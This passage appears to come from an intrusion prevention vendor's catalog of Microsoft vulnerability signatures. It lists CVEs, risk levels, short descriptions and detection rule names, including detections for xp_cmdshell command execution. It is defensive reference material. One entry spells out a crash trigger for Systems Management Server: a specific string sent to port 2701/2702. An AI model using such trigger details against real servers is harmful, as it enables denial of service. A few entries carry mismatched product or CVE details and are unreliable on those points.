Description: A cross-site scripting (XSS) vulnerability has been reported in Microsoft SharePoint. The vulnerability is due to a lack of sanitization of usernames. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to view crafted web content. A successful attack may result in the execution of script code in the target user's browser, or the execution of SharePoint commands against a SharePoint server (Cross-site request forgery).
Situation: File-Text_Microsoft-Sharepoint-Username-Sanitization-Cross-Site-Scripting
References:
CVE-2012-1861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1861
OSVDB-83647
http://www.osvdb.org/83647
MS12-050
http://technet.microsoft.com/security/bulletin/MS12-050
Back to top

Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft SharePoint Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1527-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported for Microsoft SharePoint. This vulnerability is due to improper input validation of the SetVariableActivity XML element in the workflow markup file used to generate custom workflows. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of code in the security context of the server process.
Situation: File-Text_Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization
References:
CVE-2022-35823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35823
ms22-sep
http://technet.microsoft.com/security/bulletin/ms22-sep
Back to top

Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization-2

About this vulnerability: A vulnerability in Microsoft SharePoint Enterprise Server
Risk: Moderate
First detected in: sgpkg-ips-1535-5242
Last changed: sgpkg-ips-1535-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported for Microsoft SharePoint. This vulnerability is due to improper input validation of the workflow markup file used to generate custom workflows. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of code in the security context of the server process.
Situation: File-Text_Microsoft-Sharepoint-Workflow-Isgoodworkflowcore-Insecure-Deserialization-2
References:
CVE-2022-38053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38053
ms22-oct
http://technet.microsoft.com/security/bulletin/ms22-oct
Back to top

Microsoft-SharePoint-XML-External-Entity-CVE-2021-24072

About this vulnerability: A vulnerability in Microsoft SharePoint Server
Risk: High
First detected in: sgpkg-ips-1319-5242
Last changed: sgpkg-ips-1319-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: There exists a XML External Entity vulnerability in Microsoft Sharepoint Server. A successful exploitation of this vulnerability may allow an authenticated attacker to read any file and execute arbitrary code.
Situation: File-TextId_Microsoft-SharePoint-XML-External-Entity-CVE-2021-24072
References:
CVE-2021-24072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24072
ms21-feb
http://technet.microsoft.com/security/bulletin/ms21-feb
Back to top

Microsoft-Sharepoint-Xml-Handling-Remote-File-Disclosure

About this vulnerability: A vulnerability in Microsoft Groove Server
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server; Microsoft Sharepoint
Type: Input Validation
Description: A file disclosure vulnerability has been reported in Microsoft SharePoint. The vulnerability is due to insufficient sanitation of XML by the SharePoint server. A successful attack could provide an authenticated attacker read access to arbitrary files on the SharePoint server under the security context of the affected SharePoint service.
Situation: File-TextId_Microsoft-Sharepoint-Xml-Handling-Remote-File-Disclosure
References:
CVE-2011-1892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1892
BID-49511
http://www.securityfocus.com/bid/49511
OSVDB-75381
http://www.osvdb.org/75381
MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074
Back to top

Microsoft-Sharepoint-XSS-CVE-2012-0017

About this vulnerability: A cross-site scripting vulnarability in Microsoft SharePoint
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnarability in Microsoft SharePoint
Situation: HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0017
References:
CVE-2012-0017
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0017
MS12-011
http://technet.microsoft.com/security/bulletin/MS12-011
Back to top

Microsoft-Sharepoint-XSS-CVE-2012-0144

About this vulnerability: A cross-site scripting vulnarability in Microsoft SharePoint
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnarability in Microsoft SharePoint
Situation: HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0144
References:
CVE-2012-0144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0144
MS12-011
http://technet.microsoft.com/security/bulletin/MS12-011
Back to top

Microsoft-Sharepoint-XSS-CVE-2012-0145

About this vulnerability: A cross-site scripting vulnarability in Microsoft SharePoint
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnarability in Microsoft SharePoint
Situation: HTTP_CRL-Microsoft-Sharepoint-XSS-CVE-2012-0145
References:
CVE-2012-0145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0145
MS12-011
http://technet.microsoft.com/security/bulletin/MS12-011
Back to top

Microsoft-SharePoint-XSS-CVE-2012-1859

About this vulnerability: A vulnerability in Microsoft SharePoint
Risk: High
First detected in: sgpkg-ips-462-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server 2010; Microsoft SharePoint Foundation; Microsoft Office Web Apps 2010
Type: Input Validation
Description: There is a vulnerability in Microsoft SharePoint.
Situation: HTTP_CSU-Microsoft-SharePoint-XSS-CVE-2012-1859
References:
CVE-2012-1859
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1859
MS12-050
http://technet.microsoft.com/security/bulletin/MS12-050
Back to top

Microsoft-Sharepoint-XSS-Vulnerability

About this vulnerability: A vulnerability in Microsoft Office SharePoint
Risk: Moderate
First detected in: sgpkg-ips-412-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Cross-site Scripting
Description: There is a cross-site scripting (XSS) vulnerability in Microsoft SharePoint.
Situation: HTTP_CSU-Microsoft-Sharepoint-XSS-Vulnerability
References:
CVE-2011-1893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1893
MS11-074
http://technet.microsoft.com/security/bulletin/MS11-074
Back to top

Microsoft-SharePoint-XSS-Vulnerability-CVE-2013-0083

About this vulnerability: A vulnerability in Microsoft SharePoint
Risk: High
First detected in: sgpkg-ips-515-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office SharePoint Server
Type: Cross-site Scripting
Description: There is a vulnerability in Microsoft SharePoint.
Situation: HTTP_CSU-Microsoft-SharePoint-XSS-Vulnerability-CVE-2013-0083
References:
CVE-2013-0083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0083
BID-58367
http://www.securityfocus.com/bid/58367
OSVDB-91150
http://www.osvdb.org/91150
MS13-024
http://technet.microsoft.com/security/bulletin/MS13-024
Back to top

Microsoft-Sharepoint-XSS-Vulnerability-CVE-2014-1754

About this vulnerability: A vulnerability in Apache Software Foundation Struts
Risk: High
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Cross-site Scripting
Description: An XSS vulnerability in Microsoft SharePoint Server Could Allow Remote Code Execution.
Situation: HTTP_CRL-Microsoft-Sharepoint-XSS-Vulnerability-CVE-2014-1754
References:
CVE-2014-1754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1754
BID-67288
http://www.securityfocus.com/bid/67288
MS14-022
http://technet.microsoft.com/security/bulletin/MS14-022
Back to top

Microsoft-Silverlight-Pointer-Handling-Memory-Corruption

About this vulnerability: Microsoft Silverlight Pointer Handling Memory Corruption
Risk: Critical
First detected in: sgpkg-ips-331-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Silverlight
Type: Malfunction
Description: A remote code execution vulnerability exists in Microsoft Silverlight. The vulnerability is due to a flaw in the way that Microsoft Silverlight handles pointers. Remote attackers can exploit this vulnerability by enticing target users to visit a malicious web page, potentially causing arbitrary code to be injected and executed on the target host. Successful exploitation could result in execution of arbitrary code on the vulnerable system in the context of the logged-on user. Additionally, the behaviour of the target machine is dependent on the intention of the malicious code. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: HTTP_SS-Microsoft-Silverlight-Pointer-Handling-Memory-Corruption
File-Text_Microsoft-Silverlight-Pointer-Handling-Memory-Corruption
References:
CVE-2010-0019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0019
MS10-060
http://technet.microsoft.com/security/bulletin/MS10-060
Back to top

Microsoft-Silverlight-Vulnerability-CVE-2016-0034

About this vulnerability: A vulnerability in Silverlight
Risk: Moderate
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Silverlight
Type: Malfunction
Description: A vulnerability in Silverlight.
Situation: File-Exe_Microsoft-Silverlight-Vulnerability-CVE-2016-0034
References:
CVE-2016-0034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0034
MS16-006
http://technet.microsoft.com/security/bulletin/MS16-006
Back to top

Microsoft-Silverlight-Writeablebitmap-Setsource-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Silverlight
Risk: High
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Silverlight
Type: Malfunction
Description: An information disclosure vulnerability exists in Microsoft Silverlight. The vulnerability exists in the SetSource() method of the WriteableBitmap class from System.Windows.dll. By enticing a user to visit a website, an attacker can exploit this vulnerability to disclose sensitive memory information on the target system.
Situation: File-Zip_Writeablebitmap-Setsource-Information-Disclosure
File-Exe_Writeablebitmap-Setsource-Information-Disclosure
References:
CVE-2013-3896
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3896
OSVDB-98223
http://www.osvdb.org/98223
MS13-087
http://technet.microsoft.com/security/bulletin/MS13-087
Back to top

Microsoft-SMTP-Server-DNS-Handling-Vulnerability

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Low
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exchange Server 2003;Windows Server
Type: Malfunction
Description: There is a vulnerability in the way Microsoft SMTP server handles DNS messages. When a malformed DNS response message is received by the vulnerable software, an unchecked buffer is overrun. An attacker can exploit this vulnerability to inject and execute arbitrary code on a target system. In a simple attack case, When the vulnerability is triggered, target SMTP service will terminate with a memory access violation. By default the SMTP service is not configured to automatically restart upon a critical error, therefore resulting in a denial of service condition. In a more complicated attack case, arbitrary code execution is possible. If the attacker is successful in injecting code into the vulnerable product, the behaviour of the target will be dependent on the code. The malicious code will be executed with system privileges.
Situation: DNS-TCP_Microsoft-SMTP-Server-DNS-Handling-Vulnerability
References:
CVE-2004-0840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0840
BID-11374
http://www.securityfocus.com/bid/11374
MS04-035
http://technet.microsoft.com/security/bulletin/MS04-035
Back to top

Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft SQL Server
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft SQL Server.
Situation: HTTP_SS-Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption
File-Binary_Microsoft-SQL-Server-Backup-Restoring-Memory-Corruption
References:
CVE-2008-0107
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107
BID-30119
http://www.securityfocus.com/bid/30119
MS08-040
http://technet.microsoft.com/security/bulletin/MS08-040
Back to top

Microsoft-SQL-Server-Blank-Sa-Password-Usage

About this vulnerability: Detects the usage of a blank password on the SA account on Microsoft SQL Server.
Risk: Moderate
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server
Type: Insecure Configuration
Description: By default, Microsoft SQL server uses a blank password on the SA account. The account can be used to act as an administrator on the SQL server, and to gain administrative privileges on the host.
Situation: MSSQL_Microsoft-SQL-Server-Blank-Sa-Password-Usage
Back to top

Microsoft-SQL-Server-Payload-Execution

About this vulnerability: A Microsoft SQL Server Payload Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-739-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server
Type: Configuration Error
Description: A vulnerability in Microsoft SQL Server, version 7.0, which allows remote attackers to utilize PowerShell to transmit and execute payloads.
Situation: Generic_CS-Microsoft-SQL-Server-Payload-Execution
References:
CVE-2000-1209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1209
BID-1281
http://www.securityfocus.com/bid/1281
OSVDB-557
http://www.osvdb.org/557
Back to top

Microsoft-SQL-Server-Reflected-XSS

About this vulnerability: A vulnerability in Microsoft SQL Server
Risk: High
First detected in: sgpkg-ips-484-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server 2000; Microsoft SQL Server 2005; Microsoft SQL Server 2008; Microsoft SQL Server 2012
Type: Input Validation
Description: There is a vulnerability in Microsoft SQL Server.
Situation: HTTP_CRL-Microsoft-SQL-Server-Reflected-XSS
References:
CVE-2012-2552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2552
BID-55783
http://www.securityfocus.com/bid/55783
MS12-070
http://technet.microsoft.com/security/bulletin/MS12-070
Back to top

Microsoft-SQL-Server-Reporting-Services-ViewState-RCE

About this vulnerability: A vulnerability in Microsoft SQL Server
Risk: High
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server
Type: Input Validation
Description: There exists a vulnerability in Microsoft SQL Server which allows remote attackers to execute arbitrary code by sending a crafted POST request with a serialized object.
Situation: HTTP_CS-Microsoft-SQL-Server-Reporting-Services-ViewState-RCE
HTTP_CRL-Microsoft-SQL-Server-Reporting-Services-ViewState-RCE
References:
CVE-2020-0618
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0618
Back to top

Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution

About this vulnerability: Detects the usage of the xp_cmdshell command on Microsoft SQL Server
Risk: Moderate
First detected in: sgpkg-ips-122-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft SQL Server
Type: Insecure Configuration
Description: Microsoft SQL Server includes the command xp_cmdshell, an extended stored procedure that allows users to issue arbitrary operating system commands directly to the Windows command shell. The procedure can be used normally, but is also commonly used in exploits targetting the Microsoft SQL Server.
Situation: Generic_CS-Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
HTTP_CRL-Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
SMB-TCP_Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
MSSQL_Microsoft-SQL-Server-Xp-Cmdshell-Command-Execution
Back to top

Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link-File-BOF

About this vulnerability: Buffer overflow vulnerability in Microsoft Step-by-Step Interactive Training
Risk: High
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Step-by-Step Interactive Training
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Microsoft Step-by-Step Interactive Training. By delivering a malicious bookmark link file to a target user who opens the file with a vulnerable version of the affected product, a remote attacker may cause a denial of service terminating the affected application or execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_Malicious-Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link-File
File-TextId_Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link
References:
CVE-2006-3448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3448
BID-22484
http://www.securityfocus.com/bid/22484
OSVDB-31883
http://www.osvdb.org/31883
MS07-005
http://technet.microsoft.com/security/bulletin/MS07-005
Back to top

Microsoft-System-Center-Configuration-Manager-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Systems Management Server
Risk: Moderate
First detected in: sgpkg-ips-478-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Systems Management Server
Type: Cross-site Scripting
Description: Microsoft System Center Configuration Manager contains a reflected cross site scripting vulnerability. The vulnerability is due to insufficient input validation when handling a specially crafted request. An attacker could exploit this vulnerability by enticing a user to click a link or visit a page containing script code. Successful exploitation could result in attacker controlled code being reflected back and executed in the browser context of the target user.
Situation: HTTP_CRL-Microsoft-System-Center-Configuration-Manager-Cross-Site-Scripting
References:
CVE-2012-2536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2536
BID-55430
http://www.securityfocus.com/bid/55430
OSVDB-85316
http://www.osvdb.org/85316
MS12-062
http://technet.microsoft.com/security/bulletin/MS12-062
Back to top

Microsoft-System-Center-Configuration-Manager-Vulnerability

About this vulnerability: A vulnerability in Microsoft System Center Configuration Manager
Risk: High
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft System Center Configuration Manager
Type: Malfunction
Description: There is a vulnerability in Microsoft System Center Configuration Manager.
Situation: HTTP_CRL-Microsoft-System-Center-Configuration-Manager-Vulnerability
References:
CVE-2012-2536
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2536
BID-55430
http://www.securityfocus.com/bid/55430
MS12-062
http://technet.microsoft.com/security/bulletin/MS12-062
Back to top

Microsoft-Systems-Management-Server-DoS

About this vulnerability: Denial of Service vulnerability in Microsoft SMS
Risk: Moderate
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Systems Management Server
Type: Buffer Overflow
Description: The Microsoft Systems Management Server (SMS) suffers from a buffer overflow vulnerability. The vulnerability can be exploited by sending a packet containing 'RCH0####RCHE' and additional 130 characters to the server's port 2701 or 2702, which may crash the server.
Situation: Generic_Microsoft-Systems-Management-Server-DoS
References:
CVE-2004-0728
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0728
BID-10726
http://www.securityfocus.com/bid/10726
Back to top

Microsoft-Tablet-Input-Band-Object-Handling-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a use after free vulnerability in Microsoft Tablet Input Band. An exploitation can lead to arbitrary code execution.
Situation: File-Text_Microsoft-Tablet-Input-Band-Object-Handling-Use-After-Free
References:
CVE-2015-2548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2548
MS15-109
http://technet.microsoft.com/security/bulletin/MS15-109
Back to top

Microsoft-TCP-IP-Denial-Of-Service-CVE-2021-24086

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1319-5242
Last changed: sgpkg-ips-1319-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists a denial of service vulnerability in the Microsoft TCP/IP stack.
Situation: IPv6_Routing-header-type-unknown
IPv6_Option-misaligned
IPv6_Invalid-Type0-Routing-Header
References:
CVE-2021-24086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24086
ms21-feb
http://technet.microsoft.com/security/bulletin/ms21-feb
Back to top

Microsoft-TCP-IP-Remote-Code-Execution-CVE-2021-24074

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1319-5242
Last changed: sgpkg-ips-1319-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists a remote code execution vulnerability in the Microsoft TCP/IP stack.
Situation: IP_Options-Malformed
References:
CVE-2021-24074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24074
ms21-feb
http://technet.microsoft.com/security/bulletin/ms21-feb
Back to top

Microsoft-TCP-IP-Remote-Code-Execution-CVE-2021-24094

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1319-5242
Last changed: sgpkg-ips-1319-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: There exists a remote code execution vulnerability in the Microsoft TCP/IP stack.
Situation: IPv6_Extension-headers-incomplete
IPv6_Atomic-Fragment
References:
CVE-2021-24094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24094
ms21-feb
http://technet.microsoft.com/security/bulletin/ms21-feb
Back to top

Microsoft-TCP-Timestamp-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Windows TCP/IP Stack
Risk: High
First detected in: sgpkg-ips-256-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Windows TCP/IP stack. The flaw is due to incorrect state information clean up by the TCP/IP stack when the TCP SYN flood prevention mode is on. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted packet to the target host while the target is being flooded with TCP SYN packets. Successful exploitation could potentially cause arbitrary code to be injected and executed in the security context of the System user. In this case, the behaviour of the target machine is dependent on the intention of the malicious code.
Situation: TCP_Microsoft-Windows-Timestamp-Code-Execution
References:
CVE-2009-1925
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1925
BID-36265
http://www.securityfocus.com/bid/36265
MS09-048
http://technet.microsoft.com/security/bulletin/MS09-048
Back to top

Microsoft-Text-To-Speech-CVE-2018-8634

About this vulnerability: A vulnerability in Microsoft Text To Speech
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft Text To Speech
Situation: File-Text_Microsoft-Text-To-Speech-CVE-2018-8634
References:
CVE-2018-8631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8631
Back to top

Microsoft-Time-Remote-Code-Execution-CVE-2011-3397

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-428-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: File-Text_Microsoft-Time-Remote-Code-Execution-CVE-2011-3397
References:
CVE-2011-3397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3397
MS11-090
http://technet.microsoft.com/security/bulletin/MS11-090
Back to top

Microsoft-VBA-Insecure-Library-Loading-CVE-2012-1854

About this vulnerability: A vulnerability in Microsoft Visual Basic for Applications
Risk: High
First detected in: sgpkg-ips-462-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office 2003; Microsoft Office 2007; Microsoft Office 2010; Microsoft Visual Basic for Applications
Type: Malfunction
Description: There is a vulnerability in Microsoft Visual Basic for Applications.
Situation: HTTP_CSU-Microsoft-VBA-Insecure-Library-Loading-CVE-2012-1854
References:
CVE-2012-1854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1854
BID-54303
http://www.securityfocus.com/bid/54303
OSVDB-83655
http://www.osvdb.org/83655
MS12-046
http://technet.microsoft.com/security/bulletin/MS12-046
Back to top

Microsoft-VBA6-Stack-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Visual Basic for Applications
Risk: High
First detected in: sgpkg-ips-304-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office XP; Microsoft Office 2003; Microsoft Office 2007
Type: Input Validation
Description: There is a vulnerability in Microsoft Visual Basic for Applications.
Situation: HTTP_SS-Microsoft-VBA6-Stack-Memory-Corruption
File-OLE_Microsoft-VBA6-Stack-Memory-Corruption
References:
CVE-2010-0815
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0815
MS10-030
http://technet.microsoft.com/security/bulletin/MS10-030
Back to top

Microsoft-VBScript-RCE-CVE-2018-8174

About this vulnerability: A vulnerability in Microsoft Edge
Risk: Moderate
First detected in: sgpkg-ips-1065-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Type Confusion
Description: There is a remote code execution vulnerability in the Microsoft VBScript implementation.
Situation: File-Text_Microsoft-VBScript-RCE-CVE-2018-8174
File-Text_Microsoft-VBScript-RCE-CVE-2018-8174-2
References:
CVE-2018-8174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174
ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may
Back to top

Microsoft-VBScript-Scripting-Engine-CVE-2014-6363

About this vulnerability: An attempt to exploit a vulnerability in Microsoft VBScript scripting engine
Risk: Moderate
First detected in: sgpkg-ips-620-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: A vulnerability in Microsoft VBScript scripting engine.
Situation: File-Text_Microsoft-VBScript-Scripting-Engine-CVE-2014-6363
References:
CVE-2014-6363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6363
MS14-084
http://technet.microsoft.com/security/bulletin/MS14-084
Back to top

Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Video
Risk: High
First detected in: sgpkg-ips-228-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003
Software: <os>
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft DirectShow. The flaw is due to the way Microsoft Video ActiveX Control parses image files. An attacker can persuade the target user to open a malicious web page to exploit this vulnerability.
Situation: HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow
References:
CVE-2008-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0015
BID-35558
http://www.securityfocus.com/bid/35558
OSVDB-55651
http://www.osvdb.org/55651
MS09-032
http://technet.microsoft.com/security/bulletin/MS09-032
Back to top

Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-248-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Microsoft DirectShow. The flaw is due to the way Microsoft Video ActiveX Control parses image files. An attacker can persuade the target user to open a malicious web page to exploit this vulnerability. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of memory corruption.
Situation: HTTP_SS-Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
HTTP_SS-Microsoft-Video-ActiveX-Buffer-Overflow-MS09-037-Malicious-Gif
File-Binary_Microsoft-Video-ActiveX-Buffer-Overflow-MS09-037-Malicious-Gif
File-Text_Microsoft-Video-ActiveX-Control-Stack-Buffer-Overflow-MS09-037
References:
CVE-2008-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0015
BID-35558
http://www.securityfocus.com/bid/35558
OSVDB-55651
http://www.osvdb.org/55651
MS09-037
http://technet.microsoft.com/security/bulletin/MS09-037
Back to top

Microsoft-Visio-DXF-File-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Visio
Risk: Moderate
First detected in: sgpkg-ips-384-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visio; Microsoft Office; Microsoft Office System
Type: Malfunction
Description: There exists a memory corruption vulnerability in the way Microsoft Visio handles specially-crafted DXF files. Remote attackers can exploit this vulnerability by enticing target users to open a specially crafted DXF file. Successful exploitation would result in injection and execution of arbitrary code in the context of currently logged-in user. Attempts that fail to execute injected code will likely result in denial of service conditions.
Situation: HTTP_SS-Microsoft-Visio-DXF-File-Handling-Code-Execution
File-TextId_Microsoft-Visio-DXF-File-Handling-Code-Execution
References:
CVE-2008-1090
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1090
BID-28556
http://www.securityfocus.com/bid/28556
MS08-019
http://technet.microsoft.com/security/bulletin/MS08-019
Back to top

Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Office Visio
Risk: High
First detected in: sgpkg-ips-304-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visio
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability Microsoft Visio. The vulnerability is due to a boundary error when parsing DXF files inserted into Visio documents. This vulnerability may be exploited by remote attackers by enticing a user to open a maliciously crafted Visio file with a vulnerable version of the application.
Situation: HTTP_SS-Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow
File-TextId_Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow
References:
CVE-2010-1681
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1681
BID-39836
http://www.securityfocus.com/bid/39836
Back to top

Microsoft-Visio-External-Entities-Resolution-Vulnerability

About this vulnerability: A vulnerability in Microsoft Visio
Risk: High
